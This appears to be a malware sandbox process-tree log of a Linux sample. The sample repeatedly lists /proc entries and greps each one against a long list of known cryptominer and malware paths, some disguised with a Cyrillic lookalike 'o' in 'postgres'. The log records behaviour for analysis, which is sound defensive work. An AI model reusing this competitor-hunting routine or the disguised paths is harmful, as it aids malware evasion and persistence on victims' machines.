/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:848
-
-
/bin/grepgrep exe4⤵PID:851
-
-
/bin/lsls -latrh /proc/24⤵PID:850
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:853
-
-
/bin/grepgrep exe4⤵PID:856
-
-
/bin/lsls -latrh /proc/204⤵PID:855
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:858
-
-
/bin/grepgrep exe4⤵PID:861
-
-
/bin/lsls -latrh /proc/214⤵PID:860
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:863
-
-
/bin/grepgrep exe4⤵PID:866
-
-
/bin/lsls -latrh /proc/224⤵
- Reads runtime system information
PID:865
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:868
-
-
/bin/grepgrep exe4⤵PID:871
-
-
/bin/lsls -latrh /proc/234⤵PID:870
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:873
-
-
/bin/grepgrep exe4⤵PID:876
-
-
/bin/lsls -latrh /proc/244⤵PID:875
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:878
-
-
/bin/grepgrep exe4⤵PID:881
-
-
/bin/lsls -latrh /proc/2414⤵PID:880
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:883
-
-
/bin/grepgrep exe4⤵PID:886
-
-
/bin/lsls -latrh /proc/34⤵PID:885
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:888
-
-
/bin/grepgrep exe4⤵PID:891
-
-
/bin/lsls -latrh /proc/3254⤵PID:890
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:893
-
-
/bin/grepgrep exe4⤵PID:896
-
-
/bin/lsls -latrh /proc/3264⤵PID:895
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:898
-
-
/bin/grepgrep exe4⤵PID:901
-
-
/bin/lsls -latrh /proc/3554⤵PID:900
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:903
-
-
/bin/grepgrep exe4⤵PID:906
-
-
/bin/lsls -latrh /proc/3564⤵PID:905
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:908
-
-
/bin/grepgrep exe4⤵PID:911
-
-
/bin/lsls -latrh /proc/3584⤵PID:910
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:913
-
-
/bin/grepgrep exe4⤵PID:916
-
-
/bin/lsls -latrh /proc/364⤵PID:915
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:918
-
-
/bin/grepgrep exe4⤵PID:921
-
-
/bin/lsls -latrh /proc/374⤵PID:920
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:923
-
-
/bin/grepgrep exe4⤵PID:926
-
-
/bin/lsls -latrh /proc/3744⤵PID:925
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:928
-
-
/bin/grepgrep exe4⤵PID:931
-
-
/bin/lsls -latrh /proc/3764⤵PID:930
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:935
-
-
/bin/grepgrep exe4⤵PID:938
-
-
/bin/lsls -latrh /proc/3824⤵PID:937
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:940
-
-
/bin/grepgrep exe4⤵PID:944
-
-
/bin/lsls -latrh /proc/44⤵PID:943
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:947
-
-
/bin/grepgrep exe4⤵PID:951
-
-
/bin/lsls -latrh /proc/4144⤵PID:950
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:954
-
-
/bin/grepgrep exe4⤵PID:957
-
-
/bin/lsls -latrh /proc/54⤵PID:956
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:961
-
-
/bin/grepgrep exe4⤵PID:964
-
-
/bin/lsls -latrh /proc/64⤵PID:963
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:967
-
-
/bin/grepgrep exe4⤵PID:971
-
-
/bin/lsls -latrh /proc/6654⤵PID:970
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:973
-
-
/bin/grepgrep exe4⤵PID:977
-
-
/bin/lsls -latrh /proc/6684⤵PID:976
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:980
-
-
/bin/grepgrep exe4⤵PID:984
-
-
/bin/lsls -latrh /proc/6734⤵PID:983
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:987
-
-
/bin/grepgrep exe4⤵PID:991
-
-
/bin/lsls -latrh /proc/6744⤵PID:990
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:994
-
-
/bin/grepgrep exe4⤵PID:997
-
-
/bin/lsls -latrh /proc/6794⤵PID:996
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1001
-
-
/bin/grepgrep exe4⤵PID:1004
-
-
/bin/lsls -latrh /proc/6944⤵PID:1003
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1008
-
-
/bin/grepgrep exe4⤵PID:1011
-
-
/bin/lsls -latrh /proc/6954⤵PID:1010
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1014
-
-
/bin/grepgrep exe4⤵PID:1018
-
-
/bin/lsls -latrh /proc/6994⤵PID:1017
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1020
-
-
/bin/grepgrep exe4⤵PID:1025
-
-
/bin/lsls -latrh /proc/74⤵PID:1024
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1027
-
-
/bin/lsls -latrh /proc/704⤵PID:1030
-
-
/bin/grepgrep exe4⤵PID:1031
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1034
-
-
/bin/grepgrep exe4⤵PID:1038
-
-
/bin/lsls -latrh /proc/7004⤵PID:1037
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1041
-
-
/bin/grepgrep exe4⤵PID:1044
-
-
/bin/lsls -latrh /proc/7014⤵PID:1043
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1047
-
-
/bin/grepgrep exe4⤵PID:1052
-
-
/bin/lsls -latrh /proc/7024⤵PID:1051
-
-
